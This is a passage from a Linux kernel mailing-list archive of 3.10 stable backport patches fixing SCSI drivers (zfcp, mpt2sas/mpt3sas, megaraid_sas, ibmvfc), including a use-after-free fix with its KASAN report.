+	      && reqn->fn_area_id_scope == 0
+	      && reqn->fn_fc4_type == FC_TYPE_FCP))
+		return len; /* not GPN_FT response so do not cap */
+
+	acc = sg_virt(resp_entry);
+	max_entries = (reqh->ct_mr_size * 4 / sizeof(struct fc_gpn_ft_resp))
+		+ 1 /* zfcp_fc_scan_ports: bytes correct, entries off-by-one
+		     * to account for header as 1st pseudo "entry" */;
+
+	/* the basic CT_IU preamble is the same size as one entry in the GPN_FT
+	 * response, allowing us to skip special handling for it - just skip it
+	 */
+	for (x = 1; x < max_entries && !last; x++) {
+		if (x % (ZFCP_FC_GPN_FT_ENT_PAGE + 1))
+			acc++;
+		else
+			acc = sg_virt(++resp_entry);
+
+		last = acc->fp_flags & FC_NS_FID_LAST;
+	}
+	len = min(len, (u16)(x * sizeof(struct fc_gpn_ft_resp)));
+	return len; /* cap after last entry */
 }
 
 /**
@@ -398,9 +485,10 @@ void zfcp_dbf_san_res(char *tag, struct zfcp_fsf_req *fsf)
 	struct zfcp_fsf_ct_els *ct_els = fsf->data;
 	u16 length;
 
-	length = (u16)(ct_els->resp->length);
-	zfcp_dbf_san(tag, dbf, sg_virt(ct_els->resp), ZFCP_DBF_SAN_RES, length,
-		     fsf->req_id, ct_els->d_id);
+	length = (u16)zfcp_qdio_real_bytes(ct_els->resp);
+	zfcp_dbf_san(tag, dbf, "san_res", ct_els->resp, ZFCP_DBF_SAN_RES,
+		     length, fsf->req_id, ct_els->d_id,
+		     zfcp_dbf_san_res_cap_len_if_gpn_ft(tag, fsf, length));
 }
 
 /**
@@ -414,11 +502,13 @@ void zfcp_dbf_san_in_els(char *tag, struct zfcp_fsf_req *fsf)
 	struct fsf_status_read_buffer *srb =
 		(struct fsf_status_read_buffer *) fsf->data;
 	u16 length;
+	struct scatterlist sg;
 
 	length = (u16)(srb->length -
 			offsetof(struct fsf_status_read_buffer, payload));
-	zfcp_dbf_san(tag, dbf, srb->payload.data, ZFCP_DBF_SAN_ELS, length,
-		     fsf->req_id, ntoh24(srb->d_id));
+	sg_init_one(&sg, srb->payload.data, length);
+	zfcp_dbf_san(tag, dbf, "san_els", &sg, ZFCP_DBF_SAN_ELS, length,
+		     fsf->req_id, ntoh24(srb->d_id), length);
 }
 
 /**
diff --git a/drivers/s390/scsi/zfcp_dbf.h b/drivers/s390/scsi/zfcp_dbf.h
index ac7bce8..440aa61 100644
--- a/drivers/s390/scsi/zfcp_dbf.h
+++ b/drivers/s390/scsi/zfcp_dbf.h
@@ -115,6 +115,7 @@ struct zfcp_dbf_san {
 	u32 d_id;
 #define ZFCP_DBF_SAN_MAX_PAYLOAD (FC_CT_HDR_LEN + 32)
 	char payload[ZFCP_DBF_SAN_MAX_PAYLOAD];
+	u16 pl_len;
 } __packed;
 
 /**
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 140/319] scsi: zfcp: spin_lock_irqsave() is not nestable
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (38 preceding siblings ...)
  2017-02-05 19:19 ` [PATCH 3.10 139/319] zfcp: trace full payload of all SAN records (req,resp,iels) Willy Tarreau
@ 2017-02-05 19:19 ` Willy Tarreau
  2017-02-05 19:19 ` [PATCH 3.10 141/319] scsi: mpt3sas: Fix secure erase premature termination Willy Tarreau
                   ` (178 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:19 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Dan Carpenter, Steffen Maier, Martin K . Petersen, Willy Tarreau

From: Dan Carpenter <dan.carpenter@oracle.com>

commit e7cb08e894a0b876443ef8fdb0706575dc00a5d2 upstream.

We accidentally overwrite the original saved value of "flags" so that we
can't re-enable IRQs at the end of the function.  Presumably this
function is mostly called with IRQs disabled or it would be obvious in
testing.

Fixes: aceeffbb59bb ("zfcp: trace full payload of all SAN records (req,resp,iels)")
Signed-off-by: Dan Carpenter <dan.carpenter@oracle.com>
Signed-off-by: Steffen Maier <maier@linux.vnet.ibm.com>
Signed-off-by: Martin K. Petersen <martin.petersen@oracle.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/s390/scsi/zfcp_dbf.c | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/drivers/s390/scsi/zfcp_dbf.c b/drivers/s390/scsi/zfcp_dbf.c
index d45071c..c846a63 100644
--- a/drivers/s390/scsi/zfcp_dbf.c
+++ b/drivers/s390/scsi/zfcp_dbf.c
@@ -377,7 +377,7 @@ void zfcp_dbf_san(char *tag, struct zfcp_dbf *dbf,
 	/* if (len > rec_len):
 	 * dump data up to cap_len ignoring small duplicate in rec->payload
 	 */
-	spin_lock_irqsave(&dbf->pay_lock, flags);
+	spin_lock(&dbf->pay_lock);
 	memset(payload, 0, sizeof(*payload));
 	memcpy(payload->area, paytag, ZFCP_DBF_TAG_LEN);
 	payload->fsf_req_id = req_id;
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 141/319] scsi: mpt3sas: Fix secure erase premature termination
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (39 preceding siblings ...)
  2017-02-05 19:19 ` [PATCH 3.10 140/319] scsi: zfcp: spin_lock_irqsave() is not nestable Willy Tarreau
@ 2017-02-05 19:19 ` Willy Tarreau
  2017-02-06 16:21   ` Sathya Prakash Veerichetty
  2017-02-05 19:19 ` [PATCH 3.10 142/319] mpt2sas: " Willy Tarreau
                   ` (177 subsequent siblings)
  218 siblings, 1 reply; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:19 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Andrey Grodzovsky, linux-scsi, Sathya Prakash, Chaitra P B,
	Suganath Prabu Subramani, Sreekanth Reddy, Hannes Reinecke,
	Martin K . Petersen, Willy Tarreau

From: Andrey Grodzovsky <andrey2805@gmail.com>

commit 18f6084a989ba1b38702f9af37a2e4049a924be6 upstream.

This is a work around for a bug with LSI Fusion MPT SAS2 when perfoming
secure erase. Due to the very long time the operation takes, commands
issued during the erase will time out and will trigger execution of the
abort hook. Even though the abort hook is called for the specific
command which timed out, this leads to entire device halt
(scsi_state terminated) and premature termination of the secure erase.

Set device state to busy while ATA passthrough commands are in progress.

[mkp: hand applied to 4.9/scsi-fixes, tweaked patch description]

Signed-off-by: Andrey Grodzovsky <andrey2805@gmail.com>
Acked-by: Sreekanth Reddy <Sreekanth.Reddy@broadcom.com>
Cc: <linux-scsi@vger.kernel.org>
Cc: Sathya Prakash <sathya.prakash@broadcom.com>
Cc: Chaitra P B <chaitra.basappa@broadcom.com>
Cc: Suganath Prabu Subramani <suganath-prabu.subramani@broadcom.com>
Cc: Sreekanth Reddy <Sreekanth.Reddy@broadcom.com>
Cc: Hannes Reinecke <hare@suse.de>
Signed-off-by: Martin K. Petersen <martin.petersen@oracle.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/scsi/mpt3sas/mpt3sas_scsih.c | 14 ++++++++++++++
 1 file changed, 14 insertions(+)

diff --git a/drivers/scsi/mpt3sas/mpt3sas_scsih.c b/drivers/scsi/mpt3sas/mpt3sas_scsih.c
index f8c4b85..e414b71 100644
--- a/drivers/scsi/mpt3sas/mpt3sas_scsih.c
+++ b/drivers/scsi/mpt3sas/mpt3sas_scsih.c
@@ -3515,6 +3515,10 @@ _scsih_eedp_error_handling(struct scsi_cmnd *scmd, u16 ioc_status)
 	    SAM_STAT_CHECK_CONDITION;
 }
 
+static inline bool ata_12_16_cmd(struct scsi_cmnd *scmd)
+{
+	return (scmd->cmnd[0] == ATA_12 || scmd->cmnd[0] == ATA_16);
+}
 
 /**
  * _scsih_qcmd_lck - main scsi request entry point
@@ -3543,6 +3547,13 @@ _scsih_qcmd_lck(struct scsi_cmnd *scmd, void (*done)(struct scsi_cmnd *))
 		scsi_print_command(scmd);
 #endif
 
+	/*
+	 * Lock the device for any subsequent command until command is
+	 * done.
+	 */
+	if (ata_12_16_cmd(scmd))
+		scsi_internal_device_block(scmd->device);
+
 	scmd->scsi_done = done;
 	sas_device_priv_data = scmd->device->hostdata;
 	if (!sas_device_priv_data || !sas_device_priv_data->sas_target) {
@@ -4046,6 +4057,9 @@ _scsih_io_done(struct MPT3SAS_ADAPTER *ioc, u16 smid, u8 msix_index, u32 reply)
 	if (scmd == NULL)
 		return 1;
 
+	if (ata_12_16_cmd(scmd))
+		scsi_internal_device_unblock(scmd->device, SDEV_RUNNING);
+
 	mpi_request = mpt3sas_base_get_msg_frame(ioc, smid);
 
 	if (mpi_reply == NULL) {
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 142/319] mpt2sas: Fix secure erase premature termination
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (40 preceding siblings ...)
  2017-02-05 19:19 ` [PATCH 3.10 141/319] scsi: mpt3sas: Fix secure erase premature termination Willy Tarreau
@ 2017-02-05 19:19 ` Willy Tarreau
  2017-02-05 19:19 ` [PATCH 3.10 143/319] scsi: megaraid_sas: Fix data integrity failure for JBOD (passthrough) devices Willy Tarreau
                   ` (176 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:19 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Andrey Grodzovsky, Sreekanth Reddy, Hannes Reinecke,
	PDL-MPT-FUSIONLINUX, Martin K . Petersen, Willy Tarreau

From: Andrey Grodzovsky <andrey2805@gmail.com>

Problem:
This is a work around for a bug with LSI Fusion MPT SAS2 when
pefroming secure erase. Due to the very long time the operation
takes commands issued during the erase will time out and will trigger
execution of abort hook. Even though the abort hook is called for
the specific command which timed out this leads to entire device halt
(scsi_state terminated) and premature termination of the secured erase.

Fix:
Set device state to busy while erase in progress to reject any incoming
commands until the erase is done. The device is blocked any way during
this time and cannot execute any other command.
More data and logs can be found here -
https://drive.google.com/file/d/0B9ocOHYHbbS1Q3VMdkkzeWFkTjg/view

P.S
This is a backport from the same fix for mpt3sas driver intended
for pre-4.4 stable trees.

Signed-off-by: Andrey Grodzovsky <andrey2805@gmail.com>
Cc: Sreekanth Reddy <Sreekanth.Reddy@broadcom.com>
Cc: Hannes Reinecke <hare@suse.de>
Cc: PDL-MPT-FUSIONLINUX <MPT-FusionLinux.pdl@broadcom.com>
Cc: Martin K. Petersen <martin.petersen@oracle.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/scsi/mpt2sas/mpt2sas_scsih.c | 15 +++++++++++++++
 1 file changed, 15 insertions(+)

diff --git a/drivers/scsi/mpt2sas/mpt2sas_scsih.c b/drivers/scsi/mpt2sas/mpt2sas_scsih.c
index fe76185..64caa5c 100644
--- a/drivers/scsi/mpt2sas/mpt2sas_scsih.c
+++ b/drivers/scsi/mpt2sas/mpt2sas_scsih.c
@@ -3926,6 +3926,11 @@ _scsih_setup_direct_io(struct MPT2SAS_ADAPTER *ioc, struct scsi_cmnd *scmd,
 	}
 }
 
+static inline bool ata_12_16_cmd(struct scsi_cmnd *scmd)
+{
+	return (scmd->cmnd[0] == ATA_12 || scmd->cmnd[0] == ATA_16);
+}
+
 /**
  * _scsih_qcmd - main scsi request entry point
  * @scmd: pointer to scsi command object
@@ -3948,6 +3953,13 @@ _scsih_qcmd_lck(struct scsi_cmnd *scmd, void (*done)(struct scsi_cmnd *))
 	u32 mpi_control;
 	u16 smid;
 
+	/**
+	* Lock the device for any subsequent command until
+	* command is done.
+	*/
+	if (ata_12_16_cmd(scmd))
+		scsi_internal_device_block(scmd->device);
+
 	scmd->scsi_done = done;
 	sas_device_priv_data = scmd->device->hostdata;
 	if (!sas_device_priv_data || !sas_device_priv_data->sas_target) {
@@ -4454,6 +4466,9 @@ _scsih_io_done(struct MPT2SAS_ADAPTER *ioc, u16 smid, u8 msix_index, u32 reply)
 	if (scmd == NULL)
 		return 1;
 
+	if (ata_12_16_cmd(scmd))
+		scsi_internal_device_unblock(scmd->device, SDEV_RUNNING);
+
 	mpi_request = mpt2sas_base_get_msg_frame(ioc, smid);
 
 	if (mpi_reply == NULL) {
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 143/319] scsi: megaraid_sas: Fix data integrity failure for JBOD (passthrough) devices
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (41 preceding siblings ...)
  2017-02-05 19:19 ` [PATCH 3.10 142/319] mpt2sas: " Willy Tarreau
@ 2017-02-05 19:19 ` Willy Tarreau
  2017-02-05 19:19 ` [PATCH 3.10 144/319] scsi: megaraid_sas: fix macro MEGASAS_IS_LOGICAL to avoid regression Willy Tarreau
                   ` (175 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:19 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Kashyap Desai, Sumit Saxena, Martin K . Petersen, Willy Tarreau

From: Kashyap Desai <kashyap.desai@broadcom.com>

commit 1e793f6fc0db920400574211c48f9157a37e3945 upstream.

Commit 02b01e010afe ("megaraid_sas: return sync cache call with
success") modified the driver to successfully complete SYNCHRONIZE_CACHE
commands without passing them to the controller. Disk drive caches are
only explicitly managed by controller firmware when operating in RAID
mode. So this commit effectively disabled writeback cache flushing for
any drives used in JBOD mode, leading to data integrity failures.

[mkp: clarified patch description]

Fixes: 02b01e010afeeb49328d35650d70721d2ca3fd59
Signed-off-by: Kashyap Desai <kashyap.desai@broadcom.com>
Signed-off-by: Sumit Saxena <sumit.saxena@broadcom.com>
Reviewed-by: Tomas Henzl <thenzl@redhat.com>
Reviewed-by: Hannes Reinecke <hare@suse.com>
Reviewed-by: Ewan D. Milne <emilne@redhat.com>
Signed-off-by: Martin K. Petersen <martin.petersen@oracle.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/scsi/megaraid/megaraid_sas_base.c | 13 +++++--------
 1 file changed, 5 insertions(+), 8 deletions(-)

diff --git a/drivers/scsi/megaraid/megaraid_sas_base.c b/drivers/scsi/megaraid/megaraid_sas_base.c
index 6ced6a3..0626a16 100644
--- a/drivers/scsi/megaraid/megaraid_sas_base.c
+++ b/drivers/scsi/megaraid/megaraid_sas_base.c
@@ -1487,16 +1487,13 @@ megasas_queue_command_lck(struct scsi_cmnd *scmd, void (*done) (struct scsi_cmnd
 		goto out_done;
 	}
 
-	switch (scmd->cmnd[0]) {
-	case SYNCHRONIZE_CACHE:
-		/*
-		 * FW takes care of flush cache on its own
-		 * No need to send it down
-		 */
+	/*
+	 * FW takes care of flush cache on its own for Virtual Disk.
+	 * No need to send it down for VD. For JBOD send SYNCHRONIZE_CACHE to FW.
+	 */
+	if ((scmd->cmnd[0] == SYNCHRONIZE_CACHE) && MEGASAS_IS_LOGICAL(scmd)) {
 		scmd->result = DID_OK << 16;
 		goto out_done;
-	default:
-		break;
 	}
 
 	if (instance->instancet->build_and_issue_cmd(instance, scmd)) {
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 144/319] scsi: megaraid_sas: fix macro MEGASAS_IS_LOGICAL to avoid regression
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (42 preceding siblings ...)
  2017-02-05 19:19 ` [PATCH 3.10 143/319] scsi: megaraid_sas: Fix data integrity failure for JBOD (passthrough) devices Willy Tarreau
@ 2017-02-05 19:19 ` Willy Tarreau
  2017-02-05 19:19 ` [PATCH 3.10 145/319] scsi: ibmvfc: Fix I/O hang when port is not mapped Willy Tarreau
                   ` (174 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:19 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Sumit Saxena, Kashyap Desai, Martin K . Petersen, Willy Tarreau

From: Sumit Saxena <sumit.saxena@broadcom.com>

commit 5e5ec1759dd663a1d5a2f10930224dd009e500e8 upstream.

This patch will fix regression caused by commit 1e793f6fc0db ("scsi:
megaraid_sas: Fix data integrity failure for JBOD (passthrough)
devices").

The problem was that the MEGASAS_IS_LOGICAL macro did not have braces
and as a result the driver ended up exposing a lot of non-existing SCSI
devices (all SCSI commands to channels 1,2,3 were returned as
SUCCESS-DID_OK by driver).

[mkp: clarified patch description]

Fixes: 1e793f6fc0db920400574211c48f9157a37e3945
Reported-by: Jens Axboe <axboe@kernel.dk>
Signed-off-by: Kashyap Desai <kashyap.desai@broadcom.com>
Signed-off-by: Sumit Saxena <sumit.saxena@broadcom.com>
Tested-by: Sumit Saxena <sumit.saxena@broadcom.com>
Reviewed-by: Tomas Henzl <thenzl@redhat.com>
Tested-by: Jens Axboe <axboe@fb.com>
Signed-off-by: Martin K. Petersen <martin.petersen@oracle.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/scsi/megaraid/megaraid_sas.h | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/drivers/scsi/megaraid/megaraid_sas.h b/drivers/scsi/megaraid/megaraid_sas.h
index 280e769..a0e0a61 100644
--- a/drivers/scsi/megaraid/megaraid_sas.h
+++ b/drivers/scsi/megaraid/megaraid_sas.h
@@ -1402,7 +1402,7 @@ struct megasas_instance_template {
 };
 
 #define MEGASAS_IS_LOGICAL(scp)						\
-	(scp->device->channel < MEGASAS_MAX_PD_CHANNELS) ? 0 : 1
+	((scp->device->channel < MEGASAS_MAX_PD_CHANNELS) ? 0 : 1)
 
 #define MEGASAS_DEV_INDEX(inst, scp)					\
 	((scp->device->channel % 2) * MEGASAS_MAX_DEV_PER_CHANNEL) + 	\
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 145/319] scsi: ibmvfc: Fix I/O hang when port is not mapped
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (43 preceding siblings ...)
  2017-02-05 19:19 ` [PATCH 3.10 144/319] scsi: megaraid_sas: fix macro MEGASAS_IS_LOGICAL to avoid regression Willy Tarreau
@ 2017-02-05 19:19 ` Willy Tarreau
  2017-02-05 19:19 ` [PATCH 3.10 146/319] scsi: Fix use-after-free Willy Tarreau
                   ` (173 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:19 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Brian King, Martin K . Petersen, Willy Tarreau

From: Brian King <brking@linux.vnet.ibm.com>

commit 07d0e9a847401ffd2f09bd450d41644cd090e81d upstream.

If a VFC port gets unmapped in the VIOS, it may not respond with a CRQ
init complete following H_REG_CRQ. If this occurs, we can end up having
called scsi_block_requests and not a resulting unblock until the init
complete happens, which may never occur, and we end up hanging I/O
requests.  This patch ensures the host action stay set to
IBMVFC_HOST_ACTION_TGT_DEL so we move all rports into devloss state and
unblock unless we receive an init complete.

Signed-off-by: Brian King <brking@linux.vnet.ibm.com>
Acked-by: Tyrel Datwyler <tyreld@linux.vnet.ibm.com>
Signed-off-by: Martin K. Petersen <martin.petersen@oracle.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/scsi/ibmvscsi/ibmvfc.c | 1 -
 1 file changed, 1 deletion(-)

diff --git a/drivers/scsi/ibmvscsi/ibmvfc.c b/drivers/scsi/ibmvscsi/ibmvfc.c
index 4e31caa..9206861 100644
--- a/drivers/scsi/ibmvscsi/ibmvfc.c
+++ b/drivers/scsi/ibmvscsi/ibmvfc.c
@@ -717,7 +717,6 @@ static int ibmvfc_reset_crq(struct ibmvfc_host *vhost)
 	spin_lock_irqsave(vhost->host->host_lock, flags);
 	vhost->state = IBMVFC_NO_CRQ;
 	vhost->logged_in = 0;
-	ibmvfc_set_host_action(vhost, IBMVFC_HOST_ACTION_NONE);
 
 	/* Clean out the queue */
 	memset(crq->msgs, 0, PAGE_SIZE);
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 146/319] scsi: Fix use-after-free
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (44 preceding siblings ...)
  2017-02-05 19:19 ` [PATCH 3.10 145/319] scsi: ibmvfc: Fix I/O hang when port is not mapped Willy Tarreau
@ 2017-02-05 19:19 ` Willy Tarreau
  2017-02-05 19:19 ` [PATCH 3.10 147/319] scsi: arcmsr: Buffer overflow in arcmsr_iop_message_xfer() Willy Tarreau
                   ` (172 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:19 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Ming Lei, Christoph Hellwig, Martin K . Petersen, Willy Tarreau

From: Ming Lei <tom.leiming@gmail.com>

commit bcd8f2e94808fcddf6ef3af5f060a36820dcc432 upstream.

This patch fixes one use-after-free report[1] by KASAN.

In __scsi_scan_target(), when a type 31 device is probed,
SCSI_SCAN_TARGET_PRESENT is returned and the target will be scanned
again.

Inside the following scsi_report_lun_scan(), one new scsi_device
instance is allocated, and scsi_probe_and_add_lun() is called again to
probe the target and still see type 31 device, finally
__scsi_remove_device() is called to remove & free the device at the end
of scsi_probe_and_add_lun(), so cause use-after-free in
scsi_report_lun_scan().

And the following SCSI log can be observed:

	scsi 0:0:2:0: scsi scan: INQUIRY pass 1 length 36
	scsi 0:0:2:0: scsi scan: INQUIRY successful with code 0x0
	scsi 0:0:2:0: scsi scan: peripheral device type of 31, no device added
	scsi 0:0:2:0: scsi scan: Sending REPORT LUNS to (try 0)
	scsi 0:0:2:0: scsi scan: REPORT LUNS successful (try 0) result 0x0
	scsi 0:0:2:0: scsi scan: REPORT LUN scan
	scsi 0:0:2:0: scsi scan: INQUIRY pass 1 length 36
	scsi 0:0:2:0: scsi scan: INQUIRY successful with code 0x0
	scsi 0:0:2:0: scsi scan: peripheral device type of 31, no device added
	BUG: KASAN: use-after-free in __scsi_scan_target+0xbf8/0xe40 at addr ffff88007b44a104

This patch fixes the issue by moving the putting reference at
the end of scsi_report_lun_scan().

[1] KASAN report
==================================================================
[    3.274597] PM: Adding info for serio:serio1
[    3.275127] BUG: KASAN: use-after-free in __scsi_scan_target+0xd87/0xdf0 at addr ffff880254d8c304
[    3.275653] Read of size 4 by task kworker/u10:0/27
[    3.275903] CPU: 3 PID: 27 Comm: kworker/u10:0 Not tainted 4.8.0 #2121
[    3.276258] Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS Ubuntu-1.8.2-1ubuntu1 04/01/2014
[    3.276797] Workqueue: events_unbound async_run_entry_fn
[    3.277083]  ffff880254d8c380 ffff880259a37870 ffffffff94bbc6c1 ffff880078402d80
[    3.277532]  ffff880254d8bb80 ffff880259a37898 ffffffff9459fec1 ffff880259a37930
[    3.277989]  ffff880254d8bb80 ffff880078402d80 ffff880259a37920 ffffffff945a0165
[    3.278436] Call Trace:
[    3.278528]  [<ffffffff94bbc6c1>] dump_stack+0x65/0x84
[    3.278797]  [<ffffffff9459fec1>] kasan_object_err+0x21/0x70
[    3.279063] device: 'psaux': device_add
[    3.279616]  [<ffffffff945a0165>] kasan_report_error+0x205/0x500
[    3.279651] PM: Adding info for No Bus:psaux
[    3.280202]  [<ffffffff944ecd22>] ? kfree_const+0x22/0x30
[    3.280486]  [<ffffffff94bc2dc9>] ? kobject_release+0x119/0x370
[    3.280805]  [<ffffffff945a0543>] __asan_report_load4_noabort+0x43/0x50
[    3.281170]  [<ffffffff9507e1f7>] ? __scsi_scan_target+0xd87/0xdf0
[    3.281506]  [<ffffffff9507e1f7>] __scsi_scan_target+0xd87/0xdf0
[    3.281848]  [<ffffffff9507d470>] ? scsi_add_device+0x30/0x30
[    3.282156]  [<ffffffff94f7f660>] ? pm_runtime_autosuspend_expiration+0x60/0x60
[    3.282570]  [<ffffffff956ddb07>] ? _raw_spin_lock+0x17/0x40
[    3.282880]  [<ffffffff9507e505>] scsi_scan_channel+0x105/0x160
[    3.283200]  [<ffffffff9507e8a2>] scsi_scan_host_selected+0x212/0x2f0
[    3.283563]  [<ffffffff9507eb3c>] do_scsi_scan_host+0x1bc/0x250
[    3.283882]  [<ffffffff9507efc1>] do_scan_async+0x41/0x450
[    3.284173]  [<ffffffff941c1fee>] async_run_entry_fn+0xfe/0x610
[    3.284492]  [<ffffffff941a8954>] ? pwq_dec_nr_in_flight+0x124/0x2a0
[    3.284876]  [<ffffffff941d1770>] ? preempt_count_add+0x130/0x160
[    3.285207]  [<ffffffff941a9a84>] process_one_work+0x544/0x12d0
[    3.285526]  [<ffffffff941aa8e9>] worker_thread+0xd9/0x12f0
[    3.285844]  [<ffffffff941aa810>] ? process_one_work+0x12d0/0x12d0
[    3.286182]  [<ffffffff941bb365>] kthread+0x1c5/0x260
[    3.286443]  [<ffffffff940855cd>] ? __switch_to+0x88d/0x1430
[    3.286745]  [<ffffffff941bb1a0>] ? kthread_worker_fn+0x5a0/0x5a0
[    3.287085]  [<ffffffff956dde9f>] ret_from_fork+0x1f/0x40
[    3.287368]  [<ffffffff941bb1a0>] ? kthread_worker_fn+0x5a0/0x5a0
[    3.287697] Object at ffff880254d8bb80, in cache kmalloc-2048 size: 2048
[    3.288064] Allocated:
[    3.288147] PID = 27
[    3.288218]  [<ffffffff940b27ab>] save_stack_trace+0x2b/0x50
[    3.288531]  [<ffffffff9459f246>] save_stack+0x46/0xd0
[    3.288806]  [<ffffffff9459f4bd>] kasan_kmalloc+0xad/0xe0
[    3.289098]  [<ffffffff9459c07e>] __kmalloc+0x13e/0x250
[    3.289378]  [<ffffffff95078e5a>] scsi_alloc_sdev+0xea/0xcf0
[    3.289701]  [<ffffffff9507de76>] __scsi_scan_target+0xa06/0xdf0
[    3.290034]  [<ffffffff9507e505>] scsi_scan_channel+0x105/0x160
[    3.290362]  [<ffffffff9507e8a2>] scsi_scan_host_selected+0x212/0x2f0
[    3.290724]  [<ffffffff9507eb3c>] do_scsi_scan_host+0x1bc/0x250
[    3.291055]  [<ffffffff9507efc1>] do_scan_async+0x41/0x450
[    3.291354]  [<ffffffff941c1fee>] async_run_entry_fn+0xfe/0x610
[    3.291695]  [<ffffffff941a9a84>] process_one_work+0x544/0x12d0
[    3.292022]  [<ffffffff941aa8e9>] worker_thread+0xd9/0x12f0
[    3.292325]  [<ffffffff941bb365>] kthread+0x1c5/0x260
[    3.292594]  [<ffffffff956dde9f>] ret_from_fork+0x1f/0x40
[    3.292886] Freed:
[    3.292945] PID = 27
[    3.293016]  [<ffffffff940b27ab>] save_stack_trace+0x2b/0x50
[    3.293327]  [<ffffffff9459f246>] save_stack+0x46/0xd0
[    3.293600]  [<ffffffff9459fa61>] kasan_slab_free+0x71/0xb0
[    3.293916]  [<ffffffff9459bac2>] kfree+0xa2/0x1f0
[    3.294168]  [<ffffffff9508158a>] scsi_device_dev_release_usercontext+0x50a/0x730
[    3.294598]  [<ffffffff941ace9a>] execute_in_process_context+0xda/0x130
[    3.294974]  [<ffffffff9508107c>] scsi_device_dev_release+0x1c/0x20
[    3.295322]  [<ffffffff94f566f6>] device_release+0x76/0x1e0
[    3.295626]  [<ffffffff94bc2db7>] kobject_release+0x107/0x370
[    3.295942]  [<ffffffff94bc29ce>] kobject_put+0x4e/0xa0
[    3.296222]  [<ffffffff94f56e17>] put_device+0x17/0x20
[    3.296497]  [<ffffffff9505201c>] scsi_device_put+0x7c/0xa0
[    3.296801]  [<ffffffff9507e1bc>] __scsi_scan_target+0xd4c/0xdf0
[    3.297132]  [<ffffffff9507e505>] scsi_scan_channel+0x105/0x160
[    3.297458]  [<ffffffff9507e8a2>] scsi_scan_host_selected+0x212/0x2f0
[    3.297829]  [<ffffffff9507eb3c>] do_scsi_scan_host+0x1bc/0x250
[    3.298156]  [<ffffffff9507efc1>] do_scan_async+0x41/0x450
[    3.298453]  [<ffffffff941c1fee>] async_run_entry_fn+0xfe/0x610
[    3.298777]  [<ffffffff941a9a84>] process_one_work+0x544/0x12d0
[    3.299105]  [<ffffffff941aa8e9>] worker_thread+0xd9/0x12f0
[    3.299408]  [<ffffffff941bb365>] kthread+0x1c5/0x260
[    3.299676]  [<ffffffff956dde9f>] ret_from_fork+0x1f/0x40
[    3.299967] Memory state around the buggy address:
[    3.300209]  ffff880254d8c200: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
[    3.300608]  ffff880254d8c280: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
[    3.300986] >ffff880254d8c300: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
[    3.301408]                    ^
[    3.301550]  ffff880254d8c380: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
[    3.301987]  ffff880254d8c400: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
[    3.302396]
==================================================================

Cc: Christoph Hellwig <hch@lst.de>
Signed-off-by: Ming Lei <tom.leiming@gmail.com>
Reviewed-by: Christoph Hellwig <hch@lst.de>
Signed-off-by: Martin K. Petersen <martin.petersen@oracle.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/scsi/scsi_scan.c | 2 +-
